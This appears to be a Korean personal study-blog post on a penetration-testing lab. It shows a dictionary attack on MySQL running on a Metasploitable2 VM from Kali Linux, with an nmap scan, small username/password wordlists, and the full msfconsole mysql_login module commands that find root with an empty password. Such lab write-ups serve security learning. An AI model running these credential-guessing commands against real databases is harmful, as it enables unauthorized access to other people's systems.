Study Record

[모의해킹 실습] 사전파일을 이용한 MySql 원격 로그인 시도 본문

모의해킹

[모의해킹 실습] 사전파일을 이용한 MySql 원격 로그인 시도

초코초코초코 2021. 11. 14. 23:37
728x90

1. 개요

Msfconsole 사전파일을 이용하여 (Dictionary Attack) MySql에 원격 로그인 시도를 해본다. (port : 3306)

 

2. 실습

→ msfconsole의 auxiliary/scanner/mysql/mysql_login 이용한다.

 

공격자(KaliLinux) : 192.168.10.50

공격 대상(MetasploitableV2 Linux) : 192.168.10.134

 

[KaliLinux]

㉮ 공격대상 시스템 스캔한다.

# nmap -sV -p 3632 192.168.10.134 -p 3306

㉯ 사전 파일을 만든다. 

# cd /usr/share/metasploit-framework/data/wordlists 
# vi user.txt 
root
admin
administrator
# echo "" > pass.txt               # root 사용자의 암호가 없는 경우도 있다.

→ /usr/share/metasploit-framework/data/wordlists/user.txt 파일과 /usr/share/metasploit-framework/data/wordlists/pass.txt 파일로 사전파일을 만들었다.

 

㉰ msfconsole 의 auxiliary/scanner/mysql/mysql_login 을 이용하여 공격을 시도한다.

# msfconsole -q

msf6 > use auxiliary/scanner/mysql/mysql_login

msf6 > set RHOSTS 192.168.10.134

msf6 > set USER_FILE /usr/share/metasploit-framework/data/wordlists/user.txt

msf6 > set PASS_FILE /usr/share/metasploit-framework/data/wordlists/pass.txt

msf6 > set STOP_ON_SUCCESS true

msf6 > run

사전 파일 공격 결과 ID 는 root 이고 passwd 는 없다는 것으로 나왔다.

 

㉱ 직접 root/" " 로 MySql 접속을 시도해본다.

 

728x90